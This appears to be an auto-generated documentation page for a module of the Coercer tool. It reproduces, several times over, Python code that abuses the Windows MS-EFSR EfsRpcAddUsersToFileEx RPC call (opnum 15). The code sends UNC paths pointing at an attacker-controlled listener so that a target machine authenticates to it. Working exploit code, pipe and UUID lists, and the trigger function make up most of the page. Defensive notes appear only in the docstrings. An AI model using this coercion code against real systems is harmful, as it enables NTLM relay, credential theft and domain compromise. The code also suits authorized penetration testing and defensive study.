coercer.methods.MS_EFSR.EfsRpcAddUsersToFileEx
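#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# File name          : EfsRpcAddUsersToFileEx.py
# Author             : Podalirius (@podalirius_)
# Fixed by           : XiaoliChan
# Date created       : 16 Sep 2022
# Updated in         : 18 Mar 2023


from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
from coercer.network.DCERPCSessionError import DCERPCSessionError
from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID, NDRPOINTERNULL


class EFS_RPC_BLOB(NDRSTRUCT):
    """
    MS-EFSR blob type (a DWORD followed by a byte pointer).

    Declared for completeness; nothing in this module references it.
    NOTE(review): the MS-EFSR IDL names the length ``cbData`` and the byte
    pointer ``bData``, so the names below look swapped.  Only the wire order
    (DWORD, then pointer) matters and that is unchanged; the names are the
    NDR field keys, so they are left alone rather than risk an external
    reference breaking.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )


class EFS_HASH_BLOB(NDRSTRUCT):
    """
    Certificate-hash blob embedded in ENCRYPTION_CERTIFICATE_HASH.

    Same layout and same naming caveat as EFS_RPC_BLOB above.
    """
    structure = (
        ('Data', DWORD),
        ('cbData', PCHAR),
    )


class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """
    One entry of an ENCRYPTION_CERTIFICATE_LIST.

    NOTE(review): ``'Lenght'`` is a typo, but it is the NDR field key and is
    kept so the struct's key set does not change.  The spec declares the SID
    and hash members as pointers; here they are embedded inline.  The trigger
    below never populates this struct (no certificates are sent), so the
    difference is not exercised — confirm the layout before reusing it.
    """
    structure = (
        ('Lenght', DWORD),
        ('SID', RPC_SID),
        ('Hash', EFS_HASH_BLOB),
        ('Display', LPWSTR),
    )


class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
    """
    Counted list of certificate hashes.

    NOTE(review): the spec's ``Users`` member is a sized array of pointers;
    this declaration embeds a single ENCRYPTION_CERTIFICATE_HASH.  Left as-is
    because the request below never fills it in.
    """
    structure = (
        ('nUsers', DWORD),
        ('Users', ENCRYPTION_CERTIFICATE_HASH),
    )


class _EfsRpcAddUsersToFileEx(NDRCALL):
    """
    EfsRpcAddUsersToFileEx request (MS-EFSR opnum 15).

    FileName is the attacker-controlled argument of interest: it is the path
    the server will open on the caller's behalf.
    """
    opnum = 15
    structure = (
        ('dwFlags', DWORD),                                          # Type: DWORD
        # According to this page: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
        # Reserved must be set to NULL
        ('Reserved', NDRPOINTERNULL),                                # Type: NDRPOINTERNULL *
        ('FileName', WSTR),                                          # Type: wchar_t *
        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),     # Type: ENCRYPTION_CERTIFICATE_LIST *
    )


class _EfsRpcAddUsersToFileExResponse(NDRCALL):
    """Empty response body; only the RPC outcome of the call is meaningful."""
    structure = ()


class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
    """
    Coercion trigger built on the MS-EFSR EfsRpcAddUsersToFileEx call (opnum 15).

    FileName is the controllable argument (see ``function``): it is filled
    with ``self.path``, which is presumably derived by the base class from one
    of ``exploit_paths`` — UNC paths pointing at ``{{listener}}`` — so that the
    target opens that path and authenticates to the listener.

    ``access`` enumerates the transports tried: the EFSRPC interface
    (df1941c5-...) on its own named pipe and over TCP, and the
    c681d488-... interface reached through the lsarpc/samr/lsass/netlogon
    pipes.  For defenders these are the values to key on — that interface
    UUID plus opnum 15 with a FileName carrying an external UNC path — and the
    exposure is reduced by restricting the EFSRPC interface (e.g. an RPC
    filter on the UUID above) and enforcing relay protections (signing /
    channel binding) on the services a listener would relay to.

    https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
    """

    exploit_paths = [
        ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
        ("smb", '\\\\{{listener}}\\Share\\\x00'),
        ("smb", '\\\\{{listener}}\\Share\x00'),
    ]

    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcAddUsersToFileEx",
        "opnum": 15,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcAddUsersToFileEx request carrying ``self.path`` as FileName.

        Args:
            dcerpc_session: bound DCE/RPC session; ``None`` means connect() was
                not called yet.
            target: unused here; kept for the shared trigger() signature.

        Returns:
            ``""`` when the request was sent and answered without raising,
            the caught exception object when the call failed, or ``None``
            when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcAddUsersToFileEx()
            # dwFlags is a bitwise OR of zero or more spec flags.
            # EFSRPC_ADDUSERFLAG_REPLACE_DDF (0x00000004) would require exactly
            # one certificate in EncryptionCertificates; ADD_POLICY_KEYTYPE needs
            # none, which is why it is the one used here.
            EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002
            request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE
            request['FileName'] = self.path
            # The response body is empty (_EfsRpcAddUsersToFileExResponse), so
            # the return value is not kept; only completing the call matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Presumably the caller inspects the returned exception rather than
            # catching it — this mirrors the other coercer method modules.
            return err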
class
EFS_RPC_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
class
EFS_HASH_BLOB(impacket.dcerpc.v5.ndr.NDRSTRUCT):
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Data', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('cbData', <class 'impacket.dcerpc.v5.dtypes.PCHAR'>))
class
ENCRYPTION_CERTIFICATE_HASH(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
    """
    One entry of an ENCRYPTION_CERTIFICATE_LIST: a length, the user's SID,
    the certificate-hash blob and a display string.

    ``'Lenght'`` is a typo in the field key; it is reproduced unchanged so the
    struct's key set stays identical.
    """
    structure = (('Lenght', DWORD), ('SID', RPC_SID), ('Hash', EFS_HASH_BLOB), ('Display', LPWSTR))
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('Lenght', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('SID', <class 'impacket.dcerpc.v5.dtypes.RPC_SID'>), ('Hash', <class 'EFS_HASH_BLOB'>), ('Display', <class 'impacket.dcerpc.v5.dtypes.LPWSTR'>))
class
ENCRYPTION_CERTIFICATE_LIST(impacket.dcerpc.v5.ndr.NDRSTRUCT):
class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
    """
    Counted list of certificate hashes: ``nUsers`` followed by a single
    embedded ENCRYPTION_CERTIFICATE_HASH.
    """
    structure = (('nUsers', DWORD), ('Users', ENCRYPTION_CERTIFICATE_HASH))
This will be the base class for all DCERPC NDR Types and represents a NDR Primitive Type
structure =
(('nUsers', <class 'impacket.dcerpc.v5.ndr.NDRULONG'>), ('Users', <class 'ENCRYPTION_CERTIFICATE_HASH'>))
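class EfsRpcAddUsersToFileEx(MSPROTOCOLRPCCALL):
    """
    Coercion trigger built on the MS-EFSR EfsRpcAddUsersToFileEx call (opnum 15).

    FileName is the controllable argument (see ``function``): it is filled
    with ``self.path``, which is presumably derived by the base class from one
    of ``exploit_paths`` — UNC paths pointing at ``{{listener}}`` — so that the
    target opens that path and authenticates to the listener.

    ``access`` enumerates the transports tried: the EFSRPC interface
    (df1941c5-...) on its own named pipe and over TCP, and the
    c681d488-... interface reached through the lsarpc/samr/lsass/netlogon
    pipes.  For defenders these are the values to key on — that interface
    UUID plus opnum 15 with a FileName carrying an external UNC path — and the
    exposure is reduced by restricting the EFSRPC interface (e.g. an RPC
    filter on the UUID above) and enforcing relay protections (signing /
    channel binding) on the services a listener would relay to.

    https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/d36df703-edc9-4482-87b7-d05c7783d65e
    """

    exploit_paths = [
        ("smb", '\\\\{{listener}}\\Share\\file.txt\x00'),
        ("smb", '\\\\{{listener}}\\Share\\\x00'),
        ("smb", '\\\\{{listener}}\\Share\x00'),
    ]

    access = {
        "ncan_np": [
            {
                "namedpipe": r"\PIPE\efsrpc",
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsarpc",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\samr",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\lsass",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
            {
                "namedpipe": r"\PIPE\netlogon",
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            },
        ],
        "ncacn_ip_tcp": [
            {
                "uuid": "df1941c5-fe89-4e79-bf10-463657acf44d",
                "version": "1.0"
            },
            {
                "uuid": "c681d488-d850-11d0-8c52-00c04fd90f7e",
                "version": "1.0"
            }
        ]
    }

    protocol = {
        "longname": "[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol",
        "shortname": "MS-EFSR"
    }

    function = {
        "name": "EfsRpcAddUsersToFileEx",
        "opnum": 15,
        "vulnerable_arguments": ["FileName"]
    }

    def trigger(self, dcerpc_session, target):
        """
        Send one EfsRpcAddUsersToFileEx request carrying ``self.path`` as FileName.

        Args:
            dcerpc_session: bound DCE/RPC session; ``None`` means connect() was
                not called yet.
            target: unused here; kept for the shared trigger() signature.

        Returns:
            ``""`` when the request was sent and answered without raising,
            the caught exception object when the call failed, or ``None``
            when no session was supplied.
        """
        if dcerpc_session is None:
            print("[!] Error: dce is None, you must call connect() first.")
            return None
        try:
            request = _EfsRpcAddUsersToFileEx()
            # dwFlags is a bitwise OR of zero or more spec flags.
            # EFSRPC_ADDUSERFLAG_REPLACE_DDF (0x00000004) would require exactly
            # one certificate in EncryptionCertificates; ADD_POLICY_KEYTYPE needs
            # none, which is why it is the one used here.
            EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002
            request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE
            request['FileName'] = self.path
            # The response body is empty (_EfsRpcAddUsersToFileExResponse), so
            # the return value is not kept; only completing the call matters.
            dcerpc_session.request(request)
            return ""
        except Exception as err:
            # Presumably the caller inspects the returned exception rather than
            # catching it — this mirrors the other coercer method modules.
            return err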
exploit_paths =
[('smb', '\\\\{{listener}}\\Share\\file.txt\x00'), ('smb', '\\\\{{listener}}\\Share\\\x00'), ('smb', '\\\\{{listener}}\\Share\x00')]
access =
{'ncan_np': [{'namedpipe': '\\PIPE\\efsrpc', 'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsarpc', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\samr', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\lsass', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}, {'namedpipe': '\\PIPE\\netlogon', 'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}], 'ncacn_ip_tcp': [{'uuid': 'df1941c5-fe89-4e79-bf10-463657acf44d', 'version': '1.0'}, {'uuid': 'c681d488-d850-11d0-8c52-00c04fd90f7e', 'version': '1.0'}]}
protocol =
{'longname': '[MS-EFSR]: Encrypting File System Remote (EFSRPC) Protocol', 'shortname': 'MS-EFSR'}
def
trigger(self, dcerpc_session, target):
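def trigger(self, dcerpc_session, target):
    """
    Send one EfsRpcAddUsersToFileEx request carrying ``self.path`` as FileName.

    Args:
        dcerpc_session: bound DCE/RPC session; ``None`` means connect() was
            not called yet.
        target: unused here; kept for the shared trigger() signature.

    Returns:
        ``""`` when the request was sent and answered without raising,
        the caught exception object when the call failed, or ``None``
        when no session was supplied.
    """
    if dcerpc_session is None:
        print("[!] Error: dce is None, you must call connect() first.")
        return None
    try:
        request = _EfsRpcAddUsersToFileEx()
        # dwFlags is a bitwise OR of zero or more spec flags.
        # EFSRPC_ADDUSERFLAG_REPLACE_DDF (0x00000004) would require exactly
        # one certificate in EncryptionCertificates; ADD_POLICY_KEYTYPE needs
        # none, which is why it is the one used here.
        EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE = 0x00000002
        request['dwFlags'] = EFSRPC_ADDUSERFLAG_ADD_POLICY_KEYTYPE
        request['FileName'] = self.path
        # The response body is empty (_EfsRpcAddUsersToFileExResponse), so
        # the return value is not kept; only completing the call matters.
        dcerpc_session.request(request)
        return ""
    except Exception as err:
        # Presumably the caller inspects the returned exception rather than
        # catching it — this mirrors the other coercer method modules.
        return err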